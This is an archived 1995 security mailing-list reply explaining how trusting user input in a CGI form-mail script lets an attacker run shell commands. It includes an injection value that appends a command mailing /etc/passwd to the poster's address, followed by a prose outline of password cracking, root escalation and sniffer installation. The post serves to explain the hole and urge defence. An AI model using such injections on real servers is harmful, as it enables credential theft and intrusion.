[323] in WWW Security List Archive
Re: GE Break-in: via HTTPD?
daemon@ATHENA.MIT.EDU (Paul Phillips)
Mon Jan 16 22:37:31 1995
Date: Mon, 16 Jan 1995 12:47:01 -0800 (PST)
From: Paul Phillips <psphilli@sdcc8.UCSD.EDU>
To: www-security@ns2.rutgers.edu
In-Reply-To: <9501161214.AA12258@atlas.br.RohmHaas.Com>
Reply-To: www-security@ns2.rutgers.edu
On Mon, 16 Jan 1995, Mr. Tom Cozzolino wrote:
> How is it possible? More importantly, how do we prevent
> this from happening again?
I have found several servers -- including NCSA's at one point -- that ran
CGI scripts that trusted user input too much. This can be used to
execute arbitrary commands on the server machine, under the UID the
server runs as. While this is usually "nobody", this still allows for
lots of damage.
Consider a form mail script that takes a user supplied variable and
passes it to mail like so:
system("/usr/ucb/mail -s $to_whoever");
I figure out that this is what it's doing, and make my own form that
passes to $to_whoever "foo;mail psp@ucsd.edu </etc/passwd".
Since system invokes a shell, the ; is interpreted as a command delimiter
and it happily mails me the password file. I run crack, find a few dozen
accounts to choose from (since they weren't running shadow passwords
they're probably not running npasswd either) and log in. Then I use one
of a zillion possible holes to crack root, drop in a sniffer, pick off the
rest of the network, have some more fun...
That's just one example. There are others. How do we prevent this from
happening again? Don't run a server unless you know what you're doing.
Don't allow just anyone to execute server side scripts. It's going to
happen again though, since both of these pieces of advice are violated
regularly. Do everything you can to secure your server machine -- pretend
the entire cracker population already has shells on it. They may.
--
Paul Phillips EMAIL: psp@ucsd.edu PHONE: (619) 220-0850
WWW: http://www.primus.com/staff/paulp/ FAX: (619) 220-0873
